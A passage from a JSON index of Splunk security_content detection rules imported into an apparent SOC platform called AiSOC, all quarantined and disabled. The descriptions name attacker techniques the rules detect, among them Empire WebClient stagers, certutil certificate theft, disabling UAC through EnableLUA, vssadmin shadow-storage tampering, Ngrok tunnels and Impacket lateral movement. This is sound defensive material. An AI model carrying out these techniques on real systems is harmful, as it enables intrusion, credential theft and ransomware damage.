"detections/splunk-imports/_quarantine/windows-cisco-secure-endpoint-uninstall-immunet-service-via-sfc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ba6e7f4d-a85e-4a14-8e7d-41f4b82e3c9a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_cisco_secure_endpoint_uninstall_immunet_service_via_sfc.yml" } }, { "id": "splunk-security-content-ba9e1954-4c04-11ec-8b74-3e22fbd008af", "type": "detection", "name": "Services LOLBAS Execution Process Spawn", "description": "The following analytic identifies `services.exe` spawning a LOLBAS (Living Off the Land Binaries and Scripts) execution process. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where `services.exe` is the parent process. This activity is significant because adversaries often abuse the Service Control Manager to execute malicious code via native Windows binaries, facilitating lateral movement. If confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/services-lolbas-execution-process-spawn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ba9e1954-4c04-11ec-8b74-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/services_lolbas_execution_process_spawn.yml" } }, { "id": "splunk-security-content-baa80bc8-7c9c-4395-b458-b69feb92830a", "type": "detection", "name": "Windows Suspicious React or Next.js Child Process", "description": "This analytic detects Windows processes such as cmd.exe, PowerShell, and common Windows LOLBINs being spawned by React or Next.js application servers.\nIn the context of CVE-2025-55182 / React2Shell / CVE-2025-66478 for Next.js, successful exploitation can lead to arbitrary JavaScript execution on the server, which in turn is used to invoke Node's child_process APIs (for example child_process.execSync) to run OS-level commands.\nThis detection focuses on suspicious child processes where a Next/React server process spawns an uncommon process.\nSuch activity might be a strong indicator of exploitation of the aforementioned vulnerability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1059.003", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-suspicious-react-or-next-js-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "baa80bc8-7c9c-4395-b458-b69feb92830a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_suspicious_react_or_next_js_child_process.yml" } }, { "id": "splunk-security-content-babd8d10-d073-11ea-87d0-0242ac130003", "type": "detection", "name": "Detect Windows DNS SIGRed via Splunk Stream", "description": "The following analytic detects attempts to exploit the SIGRed vulnerability (CVE-2020-1350) in Windows DNS servers. It leverages Splunk Stream DNS and TCP data to identify DNS SIG and KEY records, as well as TCP payloads exceeding 65KB. This activity is significant because SIGRed is a critical wormable vulnerability that allows remote code execution. If confirmed malicious, an attacker could gain unauthorized access, execute arbitrary code, and potentially disrupt services, leading to severe data breaches and infrastructure compromise. Immediate investigation and remediation are crucial to mitigate these risks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-windows-dns-sigred-via-splunk-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "babd8d10-d073-11ea-87d0-0242ac130003", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_windows_dns_sigred_via_splunk_stream.yml" } }, { "id": "splunk-security-content-bac85b56-0b65-4ce5-aad5-d94880df0967", "type": "detection", "name": "Windows Steal Authentication Certificates CertUtil Backup", "description": "The following analytic detects CertUtil.exe performing a backup of the Certificate Store. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line executions involving CertUtil with backup parameters. This activity is significant because it may indicate an attempt to steal authentication certificates, which are critical for secure communications. If confirmed malicious, an attacker could use the stolen certificates to impersonate users, decrypt sensitive data, or gain unauthorized access to systems, leading to severe security breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-steal-authentication-certificates-certutil-backup.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bac85b56-0b65-4ce5-aad5-d94880df0967", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_steal_authentication_certificates_certutil_backup.yml" } }, { "id": "splunk-security-content-bb093c30-d860-4858-a56e-cd0895d5b49c", "type": "detection", "name": "Azure AD User Consent Denied for OAuth Application", "description": "The following analytic identifies instances where a user has denied consent to an OAuth application seeking permissions within the Azure AD environment. This detection leverages Azure AD's audit logs, specifically focusing on user consent actions with error code 65004. Monitoring denied consent actions is significant as it can indicate users recognizing potentially suspicious or untrusted applications. If confirmed malicious, this activity could suggest attempts by unauthorized applications to gain access, potentially leading to data breaches or unauthorized actions within the environment. Understanding these denials helps refine security policies and enhance user awareness.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-user-consent-denied-for-oauth-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bb093c30-d860-4858-a56e-cd0895d5b49c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_user_consent_denied_for_oauth_application.yml" } }, { "id": "splunk-security-content-bb1481fd-23c0-4195-b6a0-94d746c9637c", "type": "detection", "name": "Crowdstrike Admin Weak Password Policy", "description": "The following analytic detects CrowdStrike alerts for admin weak password policy violations, identifying instances where administrative passwords do not meet security standards. These alerts highlight significant vulnerabilities that could be exploited by attackers to gain unauthorized access. Promptly addressing these alerts is crucial for maintaining robust security and protecting critical systems and data from potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crowdstrike-admin-weak-password-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bb1481fd-23c0-4195-b6a0-94d746c9637c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/crowdstrike_admin_weak_password_policy.yml" } }, { "id": "splunk-security-content-bb1c2c30-107a-4e56-a4b9-1f7022867bfe", "type": "detection", "name": "F5 BIG-IP iControl REST Vulnerability CVE-2022-1388", "description": "The following analytic detects attempts to exploit the F5 BIG-IP iControl REST API vulnerability (CVE-2022-1388) for unauthenticated remote code execution.\nIt identifies suspicious URI paths and POST HTTP methods, along with specific request headers containing potential commands in the `utilcmdargs` field and a random base64 encoded value in the `X-F5-Auth-Token` field.\nThis activity is significant as it targets a critical vulnerability that can allow attackers to execute arbitrary commands on the affected system.\nIf confirmed malicious, this could lead to full system compromise and unauthorized access to sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/f5-big-ip-icontrol-rest-vulnerability-cve-2022-1388.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bb1c2c30-107a-4e56-a4b9-1f7022867bfe", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/f5_big_ip_icontrol_rest_vulnerability_cve_2022_1388.yml" } }, { "id": "splunk-security-content-bb27cbce-d4de-432c-932f-2e206e9130fb", "type": "detection", "name": "Okta New Device Enrolled on Account", "description": "The following analytic identifies when a new device is enrolled on an Okta account. It uses OktaIm2 logs ingested via the Splunk Add-on for Okta Identity Cloud to detect the creation of new device enrollments. This activity is significant as it may indicate a legitimate user setting up a new device or an adversary adding a device to maintain unauthorized access. If confirmed malicious, this could lead to potential account takeover, unauthorized access, and persistent control over the compromised Okta account. Monitoring this behavior is crucial for detecting and mitigating unauthorized access attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-new-device-enrolled-on-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bb27cbce-d4de-432c-932f-2e206e9130fb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_new_device_enrolled_on_account.yml" } }, { "id": "splunk-security-content-bb37061e-af1f-11eb-a159-acde48001122", "type": "detection", "name": "Schtasks Run Task On Demand", "description": "The following analytic detects the execution of a Windows Scheduled Task on demand via the shell or command line. It leverages process-related data, including process name, parent process, and command-line executions, sourced from endpoint logs. The detection focuses on 'schtasks.exe' with an associated 'run' command. This activity is significant as adversaries often use it to force the execution of their created Scheduled Tasks for persistent access or lateral movement within a compromised machine. If confirmed malicious, this could allow attackers to maintain persistence or move laterally within the network, potentially leading to further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/schtasks-run-task-on-demand.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bb37061e-af1f-11eb-a159-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/schtasks_run_task_on_demand.yml" } }, { "id": "splunk-security-content-bb3c1bac-6bdf-4aa0-8dc9-068b8b712a76", "type": "detection", "name": "Impacket Lateral Movement smbexec CommandLine Parameters", "description": "The following analytic identifies suspicious command-line parameters associated with the use of Impacket's smbexec.py for lateral movement. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line patterns indicative of Impacket tool usage. This activity is significant as both Red Teams and adversaries use Impacket for remote code execution and lateral movement. If confirmed malicious, this activity could allow attackers to execute commands on remote endpoints, potentially leading to unauthorized access, data exfiltration, or further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1021.003", "T1047", "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/impacket-lateral-movement-smbexec-commandline-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bb3c1bac-6bdf-4aa0-8dc9-068b8b712a76", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/impacket_lateral_movement_smbexec_commandline_parameters.yml" } }, { "id": "splunk-security-content-bb4f3090-7ae4-11ec-897f-acde48001122", "type": "detection", "name": "Windows NirSoft AdvancedRun", "description": "The following analytic detects the execution of AdvancedRun.exe, a tool with capabilities similar to remote administration programs like PsExec. It identifies the process by its name or original file name and flags common command-line arguments. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and command-line telemetry. Monitoring this activity is crucial as AdvancedRun can be used for remote code execution and configuration-based automation. If malicious, this could allow attackers to execute arbitrary commands, escalate privileges, or maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1588.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-nirsoft-advancedrun.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bb4f3090-7ae4-11ec-897f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_nirsoft_advancedrun.yml" } }, { "id": "splunk-security-content-bbc644bc-37df-4e1a-9c88-ec9a53e2038c", "type": "detection", "name": "Disabling Remote User Account Control", "description": "The following analytic identifies modifications to the registry key that controls the enforcement of Windows User Account Control (UAC). It detects changes to the registry path `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA` where the value is set to `0x00000000`. This activity is significant because disabling UAC can allow unauthorized changes to the system without user consent, potentially leading to privilege escalation. If confirmed malicious, an attacker could gain elevated privileges, making it easier to execute further attacks or maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabling-remote-user-account-control.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bbc644bc-37df-4e1a-9c88-ec9a53e2038c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabling_remote_user_account_control.yml" } }, { "id": "splunk-security-content-bbf55ebf-c416-4f62-94d9-4064f2a28014", "type": "detection", "name": "Zscaler Legal Liability Threat Blocked", "description": "The following analytic identifies significant legal liability threats blocked by the Zscaler web proxy. It uses web proxy logs to track destinations, device owners, users, URL categories, and actions associated with legal liability. By leveraging statistics on unique fields, it ensures a precise focus on these threats. This activity is significant for SOC as it helps enforce legal compliance and risk management. If confirmed malicious, it could indicate attempts to access legally sensitive or restricted content, potentially leading to legal repercussions and compliance violations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-legal-liability-threat-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bbf55ebf-c416-4f62-94d9-4064f2a28014", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_legal_liability_threat_blocked.yml" } }, { "id": "splunk-security-content-bc0ca53f-dea6-4906-9b12-09c396fdf1d3", "type": "detection", "name": "Linux Auditd Insert Kernel Module Using Insmod Utility", "description": "The following analytic detects the insertion of a Linux kernel module using the insmod utility. It leverages data from Linux Auditd, focusing on process execution logs that include process names and command-line details. This activity is significant as it may indicate the installation of a rootkit or malicious kernel module, potentially allowing an attacker to gain elevated privileges and bypass security detections. If confirmed malicious, this could lead to unauthorized code execution, persistent access, and severe compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-insert-kernel-module-using-insmod-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bc0ca53f-dea6-4906-9b12-09c396fdf1d3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_insert_kernel_module_using_insmod_utility.yml" } }, { "id": "splunk-security-content-bc1dc6b8-c954-11eb-bade-acde48001122", "type": "detection", "name": "Detect Empire with PowerShell Script Block Logging", "description": "The following analytic detects suspicious PowerShell execution indicative of PowerShell-Empire activity. It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze commands sent to PowerShell, specifically looking for patterns involving `system.net.webclient` and base64 encoding. This behavior is significant as it often represents initial stagers used by PowerShell-Empire, a known post-exploitation framework. If confirmed malicious, this activity could allow attackers to download and execute additional payloads, leading to potential code execution, data exfiltration, or further compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-empire-with-powershell-script-block-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bc1dc6b8-c954-11eb-bade-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_empire_with_powershell_script_block_logging.yml" } }, { "id": "splunk-security-content-bc24922d-987c-4645-b288-f8c73ec194c4", "type": "detection", "name": "Cloud Compute Instance Created With Previously Unseen Image", "description": "The following analytic detects the creation of cloud compute instances using previously unseen image IDs. It leverages cloud infrastructure logs to identify new image IDs that have not been observed before. This activity is significant because it may indicate unauthorized or suspicious activity, such as the deployment of malicious payloads or unauthorized access to sensitive information. If confirmed malicious, this could lead to data breaches, unauthorized access, or further compromise of the cloud environment. Immediate investigation is required to determine the legitimacy of the instance creation and to mitigate potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cloud-compute-instance-created-with-previously-unseen-image.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bc24922d-987c-4645-b288-f8c73ec194c4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/cloud_compute_instance_created_with_previously_unseen_image.yml" } }, { "id": "splunk-security-content-bc477b57-5c21-4ab6-9c33-668772e7f114", "type": "detection", "name": "Detect Regsvcs Spawning a Process", "description": "The following analytic identifies regsvcs.exe spawning a child process. This behavior is detected using Endpoint Detection and Response (EDR) telemetry, focusing on process creation events where the parent process is regsvcs.exe. This activity is significant because regsvcs.exe rarely spawns child processes, and such behavior can indicate an attempt to bypass application control mechanisms. If confirmed malicious, this could allow an attacker to execute arbitrary code, potentially leading to privilege escalation or persistent access within the environment. Immediate investigation is recommended to determine the legitimacy of the spawned process and any associated suspicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.009" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-regsvcs-spawning-a-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bc477b57-5c21-4ab6-9c33-668772e7f114", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_regsvcs_spawning_a_process.yml" } }, { "id": "splunk-security-content-bc5b2304-f241-419b-874a-e927f667b7b6", "type": "detection", "name": "Windows Scheduled Task DLL Module Loaded", "description": "The following analytic detects instances where the taskschd.dll is loaded by processes running in suspicious or writable directories. This activity is unusual, as legitimate processes that load taskschd.dll typically reside in protected system locations. Malware or threat actors may attempt to load this DLL from writable or non-standard directories to manipulate the Task Scheduler and execute malicious tasks. By identifying processes that load taskschd.dll in these unsafe locations, this detection helps security analysts flag potentially malicious activity and investigate further to prevent unauthorized system modifications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-scheduled-task-dll-module-loaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bc5b2304-f241-419b-874a-e927f667b7b6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_scheduled_task_dll_module_loaded.yml" } }, { "id": "splunk-security-content-bc760ca6-8336-11eb-bcbb-acde48001122", "type": "detection", "name": "Resize ShadowStorage volume", "description": "The following analytic identifies the resizing of shadow storage volumes, a technique used by ransomware like CLOP to prevent the recreation of shadow volumes. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving \"vssadmin.exe\" with parameters related to resizing shadow storage. This activity is significant as it indicates an attempt to hinder recovery efforts by manipulating shadow copies. If confirmed malicious, this could lead to successful ransomware deployment, making data recovery difficult and increasing the potential for data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/resize-shadowstorage-volume.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bc760ca6-8336-11eb-bcbb-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/resize_shadowstorage_volume.yml" } }, { "id": "splunk-security-content-bc84d574-708c-467d-b78a-4c1e20171f97", "type": "detection", "name": "Linux Ngrok Reverse Proxy Usage", "description": "The following analytic detects the use of Ngrok on a Linux operating system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments associated with Ngrok. This activity is significant because Ngrok can be used by adversaries to establish reverse proxies, potentially bypassing network defenses. If confirmed malicious, this could allow attackers to create persistent, unauthorized access channels, facilitating data exfiltration or further exploitation of the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1572", "T1090", "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-ngrok-reverse-proxy-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bc84d574-708c-467d-b78a-4c1e20171f97", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_ngrok_reverse_proxy_usage.yml" } }, { "id": "splunk-security-content-bc91a8cd-35e7-4bb2-6140-e756cc46fd71", "type": "detection", "name": "Detect AWS Console Login by New User", "description": "The following analytic detects AWS console login events by new users. It leverages AWS CloudTrail events and compares them against a lookup file of previously seen users based on ARN values. This detection is significant because a new user logging into the AWS console could indicate the creation of new accounts or potential unauthorized access. If confirmed malicious, this activity could lead to unauthorized access to AWS resources, data exfiltration, or further exploitation within the cloud environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-aws-console-login-by-new-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bc91a8cd-35e7-4bb2-6140-e756cc46fd71", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_aws_console_login_by_new_user.yml" } }, { "id": "splunk-security-content-bc9cb715-08ba-40c3-9758-6e2b26e455cb", "type": "detection", "name": "Windows Unusual Count Of Users Failed To Auth Using Kerberos", "description": "The following analytic identifies a source endpoint failing to authenticate multiple valid users using the Kerberos protocol, potentially indicating a Password Spraying attack. It leverages Event 4771, which is generated when the Key Distribution Center fails to issue a Kerberos Ticket Granting Ticket (TGT) due to a wrong password (failure code 0x18). This detection uses statistical analysis, specifically the 3-sigma rule, to identify unusual authentication failures. If confirmed malicious, this activity could allow an attacker to gain initial access or elevate privileges within an Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-count-of-users-failed-to-auth-using-kerberos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bc9cb715-08ba-40c3-9758-6e2b26e455cb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_count_of_users_failed_to_auth_using_kerberos.yml" } }, { "id": "splunk-security-content-bca48629-7fa2-40d3-9e5d-807564504e28", "type": "detection", "name": "Windows AppLocker Privilege Escalation via Unauthorized Bypass", "description": "The following analytic utilizes Windows AppLocker event logs to identify attempts to bypass application restrictions. AppLocker is a feature that allows administrators to specify which applications are permitted to run on a system. This analytic is designed to identify attempts to bypass these restrictions, which could be indicative of an attacker attempting to escalate privileges. The analytic uses EventCodes 8007, 8004, 8022, 8025, 8029, and 8040 to identify these attempts. The analytic will identify the host, full file path, and target user associated with the bypass attempt. These EventCodes are related to block events and focus on 5 attempts or more.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-applocker-privilege-escalation-via-unauthorized-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "bca48629-7fa2-40d3-9e5d-807564504e28", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_applocker_privilege_escalation_via_unauthorized_bypass.yml" } }, { "id": "splunk-security-content-bce3ed7c-9b1f-42a0-abdf-d8b123a34836", "type": "detection", "name": "Detect New Login Attempts to Routers", "description": "The following analytic identifies new login attempts to routers. It leverages authentication logs from the ES Assets and Identity Framework, focusing on assets categorized as routers. The detection flags connections that have not been observed in the past 30 days. This activity is significant because unauthorized access to routers can lead to network disruptions or data interception. If confirmed malicious, 